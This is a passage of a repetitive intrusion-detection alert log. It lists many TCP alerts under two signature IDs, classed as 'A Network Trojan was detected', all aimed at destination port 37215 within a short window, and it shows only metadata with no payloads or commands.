          SID:2835222
          Source Port:54316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921022
          SID:2829579
          Source Port:60056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948435
          SID:2835222
          Source Port:40912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557443
          SID:2835222
          Source Port:48434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917135
          SID:2829579
          Source Port:60760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165113
          SID:2835222
          Source Port:50846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038597
          SID:2829579
          Source Port:58220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035623
          SID:2835222
          Source Port:60766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923103
          SID:2829579
          Source Port:57516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.658600
          SID:2829579
          Source Port:41066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241936
          SID:2835222
          Source Port:36526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168071
          SID:2835222
          Source Port:33788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929646
          SID:2829579
          Source Port:49090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157770
          SID:2829579
          Source Port:42708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416358
          SID:2835222
          Source Port:48360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860747
          SID:2829579
          Source Port:54650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914950
          SID:2835222
          Source Port:58796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167270
          SID:2829579
          Source Port:55768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075618
          SID:2835222
          Source Port:45668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990084
          SID:2835222
          Source Port:41600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719520
          SID:2829579
          Source Port:41066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284086
          SID:2835222
          Source Port:32924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164027
          SID:2829579
          Source Port:43742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205479
          SID:2829579
          Source Port:33198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869127
          SID:2829579
          Source Port:43902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476637
          SID:2835222
          Source Port:44518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.897642
          SID:2829579
          Source Port:43170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716909
          SID:2835222
          Source Port:58920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.897770
          SID:2835222
          Source Port:44472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206567
          SID:2829579
          Source Port:42636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243694
          SID:2829579
          Source Port:54884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399499
          SID:2835222
          Source Port:48396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206364
          SID:2829579
          Source Port:46030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718267
          SID:2835222
          Source Port:57396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131932
          SID:2835222
          Source Port:53866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397805
          SID:2835222
          Source Port:49186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867176
          SID:2835222
          Source Port:46140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.307521
          SID:2835222
          Source Port:48396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398775
          SID:2835222
          Source Port:42588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082240
          SID:2835222
          Source Port:32892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948367
          SID:2829579
          Source Port:34400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866002
          SID:2829579
          Source Port:35082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397540
          SID:2835222
          Source Port:42736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014984
          SID:2835222
          Source Port:55378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.694033
          SID:2829579
          Source Port:46418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468900
          SID:2829579
          Source Port:48944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944749
          SID:2835222
          Source Port:41960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946380
          SID:2835222
          Source Port:57486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291590
          SID:2829579
          Source Port:41686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.914728
          SID:2829579
          Source Port:34136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415946
          SID:2835222
          Source Port:40216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718768
          SID:2829579
          Source Port:44444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166246
          SID:2835222
          Source Port:53364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538864
          SID:2835222
          Source Port:54716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478013
          SID:2835222
          Source Port:50568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283652
          SID:2829579
          Source Port:47614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929532
          SID:2829579
          Source Port:32790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600511
          SID:2829579
          Source Port:40920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928792
          SID:2835222
          Source Port:39358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557208
          SID:2829579
          Source Port:50892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306164
          SID:2835222
          Source Port:59304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223988
          SID:2835222
          Source Port:45812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604609
          SID:2829579
          Source Port:46226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.229960
          SID:2835222
          Source Port:54044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081932
          SID:2835222
          Source Port:60894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568092
          SID:2829579
          Source Port:48836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718509
          SID:2835222
          Source Port:58050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926165
          SID:2829579
          Source Port:51860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032023
          SID:2829579
          Source Port:45082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930050
          SID:2835222
          Source Port:45350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922237
          SID:2829579
          Source Port:46986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.308877
          SID:2835222
          Source Port:58038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398406
          SID:2835222
          Source Port:60422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038419
          SID:2829579
          Source Port:54782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296748
          SID:2835222
          Source Port:48630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076317
          SID:2829579
          Source Port:33498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288095
          SID:2829579
          Source Port:32792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822275
          SID:2829579
          Source Port:56002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538977
          SID:2829579
          Source Port:40712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222821
          SID:2829579
          Source Port:53012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467850
          SID:2835222
          Source Port:57146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168779
          SID:2835222
          Source Port:47752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904324
          SID:2829579
          Source Port:48302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206910
          SID:2835222
          Source Port:50572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952216
          SID:2829579
          Source Port:48918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034902
          SID:2835222
          Source Port:51214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677122
          SID:2835222
          Source Port:40306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.291182
          SID:2835222
          Source Port:48974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244905
          SID:2829579
          Source Port:39390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644444
          SID:2835222
          Source Port:43890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.078430
          SID:2829579
          Source Port:42672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397739
          SID:2835222
          Source Port:53614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475947
          SID:2835222
          Source Port:42262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226943
          SID:2829579
          Source Port:44054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643856
          SID:2835222
          Source Port:34604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.996200
          SID:2829579
          Source Port:45138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418941
          SID:2829579
          Source Port:55330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988496
          SID:2835222
          Source Port:50952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225563
          SID:2829579
          Source Port:33192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643312
          SID:2829579
          Source Port:52030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274311
          SID:2829579
          Source Port:36422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910544
          SID:2829579
          Source Port:36188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133195
          SID:2835222
          Source Port:58434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717822
          SID:2835222
          Source Port:55508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286373
          SID:2835222
          Source Port:44344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863284
          SID:2829579
          Source Port:36584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253250
          SID:2835222
          Source Port:47980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867952
          SID:2829579
          Source Port:56234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924415
          SID:2835222
          Source Port:34586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225405
          SID:2829579
          Source Port:44392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287108
          SID:2835222
          Source Port:38122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718357
          SID:2829579
          Source Port:59102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.636084
          SID:2829579
          Source Port:41722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471679
          SID:2835222
          Source Port:60764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568396
          SID:2835222
          Source Port:59698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920220
          SID:2835222
          Source Port:57732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947743
          SID:2829579
          Source Port:57650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948533
          SID:2829579
          Source Port:56948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566201
          SID:2829579
          Source Port:47366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296409
          SID:2835222
          Source Port:45574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031957
          SID:2835222
          Source Port:53468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244280
          SID:2835222
          Source Port:45582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928182
          SID:2829579
          Source Port:46044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306145
          SID:2835222
          Source Port:39098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945352
          SID:2835222
          Source Port:48624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566053
          SID:2835222
          Source Port:53426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597394
          SID:2835222
          Source Port:58882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714777
          SID:2829579
          Source Port:39384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.293950
          SID:2835222
          Source Port:57888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993267
          SID:2835222
          Source Port:41172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163765
          SID:2829579
          Source Port:54402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713876
          SID:2829579
          Source Port:44410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164834
          SID:2835222
          Source Port:39384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205451
          SID:2835222
          Source Port:53654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296936
          SID:2835222
          Source Port:33482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476777
          SID:2835222
          Source Port:35608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400451
          SID:2835222
          Source Port:47364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283367
          SID:2829579
          Source Port:42358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081844
          SID:2835222
          Source Port:38098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892659
          SID:2829579
          Source Port:38428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017523
          SID:2835222
          Source Port:55388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165166
          SID:2829579
          Source Port:36086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719666
          SID:2829579
          Source Port:54154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719712
          SID:2829579
          Source Port:46708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538834
          SID:2829579
          Source Port:37834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557636
          SID:2829579
          Source Port:43650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566097
          SID:2829579
          Source Port:35976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892460
          SID:2835222
          Source Port:59914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399989
          SID:2829579
          Source Port:58578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928178
          SID:2835222
          Source Port:59138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227657
          SID:2835222
          Source Port:52912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035744
          SID:2829579
          Source Port:55890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.040588
          SID:2835222
          Source Port:48772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230899
          SID:2835222
          Source Port:47520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823246
          SID:2829579
          Source Port:40022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286829
          SID:2835222
          Source Port:43068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645137
          SID:2829579
          Source Port:60274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244204
          SID:2829579
          Source Port:54212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.899294
          SID:2835222
          Source Port:60204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558990
          SID:2829579
          Source Port:49524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288293
          SID:2829579
          Source Port:58498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037494
          SID:2835222
          Source Port:59566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646239
          SID:2829579
          Source Port:42500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.480759
          SID:2835222
          Source Port:47450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398810
          SID:2829579
          Source Port:52954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163784
          SID:2829579
          Source Port:39502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294571
          SID:2829579
          Source Port:60806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246035
          SID:2829579
          Source Port:47136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162742
          SID:2835222
          Source Port:46026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564984
          SID:2835222
          Source Port:50776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.297032
          SID:2829579
          Source Port:45192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418980
          SID:2835222
          Source Port:53206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289027
          SID:2829579
          Source Port:59706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539181
          SID:2829579
          Source Port:57130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034538
          SID:2835222
          Source Port:33022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.859268
          SID:2835222
          Source Port:36952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163253
          SID:2835222
          Source Port:43054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.208259
          SID:2835222
          Source Port:54578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822072
          SID:2829579
          Source Port:52268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033914
          SID:2835222
          Source Port:46648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643966
          SID:2829579
          Source Port:42088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282521
          SID:2829579
          Source Port:59628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298067
          SID:2835222
          Source Port:35986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471824
          SID:2835222
          Source Port:59720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993716
          SID:2829579
          Source Port:59634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861109
          SID:2835222
          Source Port:43636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133709
          SID:2829579
          Source Port:36944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272396
          SID:2829579
          Source Port:38556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987947
          SID:2835222
          Source Port:47620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103331
          SID:2835222
          Source Port:35250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.137920
          SID:2835222
          Source Port:48818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599292
          SID:2835222
          Source Port:36924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.992295
          SID:2829579
          Source Port:55514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027410
          SID:2835222
          Source Port:33586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396353
          SID:2829579
          Source Port:33942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715805
          SID:2835222
          Source Port:44930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419621
          SID:2835222
          Source Port:58458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718774
          SID:2835222
          Source Port:36890
          Destination Port:37215
